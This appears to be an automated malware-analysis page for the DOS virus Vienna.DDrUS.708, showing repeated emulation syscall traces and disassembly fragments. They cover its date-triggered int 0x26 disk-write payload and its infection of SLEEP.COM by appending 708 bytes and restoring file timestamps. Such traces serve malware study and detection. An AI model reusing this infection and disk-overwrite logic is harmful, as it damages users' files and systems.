Sample viewer

vx.netlux.org/Virus.DOS.Vienna.DDrUS.708

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:29.383154076Z 48 PC: 12a6b | Get DOS version
2018-12-17T23:11:29.38538922Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T23:11:29.386917825Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T23:11:29.388294073Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-17T23:11:29.391331435Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-17T23:11:29.398626505Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
0x12ad0: add si, 0x31
0x12ad3: nop
0x12ad4: lodsb al, byte ptr [si]
0x12ad5: mov cx, 0x8000
0x12ad8: repne scasb al, byte ptr es:[di]
0x12ada: mov cx, 4
2018-12-17T23:11:29.402120978Z 78 PC: 12b51 | Find first file
2018-12-17T23:11:29.409330958Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:11:29.416757155Z 67 PC: 12ba1 | Get or set file attributes
2018-12-17T23:11:29.43298218Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:29.440485632Z 87 PC: 12bb8 | Get or set file date and time
2018-12-17T23:11:29.443245974Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-17T23:11:29.446036031Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:11:29.454028472Z 66 PC: 12be9 | Move file pointer
2018-12-17T23:11:29.456525008Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-17T23:11:29.46671892Z 66 PC: 12c20 | Move file pointer
2018-12-17T23:11:29.468567727Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:29.476800782Z 87 PC: 12c42 | Get or set file date and time
2018-12-17T23:11:29.478988897Z 62 PC: 12c46 | Close file
2018-12-17T23:11:29.488355533Z 67 PC: 12c55 | Get or set file attributes
2018-12-17T23:11:29.501182437Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.398500399Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.39999201Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.400939441Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:10.401816239Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:55:10.404356009Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.41007644Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.41527315Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.435171846Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.441477302Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:55:10.442623978Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:55:10.44503455Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.451068279Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.452261339Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.460330306Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.461857842Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.468000962Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.469385735Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.477423199Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.4870369Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.512372646Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.513901383Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.515603809Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:10.517173481Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:55:10.51991086Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-25T12:55:10.523971274Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.531143427Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.537342859Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.560886058Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.56853846Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:55:10.570182166Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:55:10.573149924Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.580402834Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.582208483Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.592185624Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.593802452Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.601684899Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.60349235Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.612909379Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.624310206Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.534353086Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.536384598Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.537444019Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:10.538453248Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:55:10.540720245Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.546762398Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.552128723Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.568278592Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.575162607Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:55:10.576364848Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:55:10.578312102Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.585044737Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.586344818Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.594459188Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.596096435Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.6027179Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.604059059Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.611811886Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.621272807Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.616321456Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.617766251Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.618887616Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:10.619875376Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:55:10.622591864Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.628647489Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.634284625Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.6502807Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.657123961Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:55:10.658750245Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:55:10.661301345Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.667578141Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.668844879Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.67695583Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.678532017Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.685144549Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.686483789Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.697191725Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.706709512Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.721927568Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.723303057Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.724380482Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:10.725196226Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:55:10.727148341Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.733036748Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.738525977Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.757144912Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.763642452Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:55:10.764824286Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:55:10.767025269Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.773109299Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.774303672Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.782440881Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.783733024Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.790168394Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.791631927Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.79784821Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.803790716Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:11.096867202Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:11.100526201Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:11.101781549Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:55:11.102955032Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:55:11.106197617Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:11.113070417Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:11.119454079Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:11.137505459Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:11.144789216Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:55:11.145712506Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2f
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:55:11.147175161Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:11.151665788Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:11.152718064Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:11.15812Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:11.159684188Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:11.163978249Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:11.165074576Z 62 PC: 12c46 | Close file
2018-12-25T12:55:11.184102375Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:11.19086635Z 26 PC: 12c62 | Set disk transfer address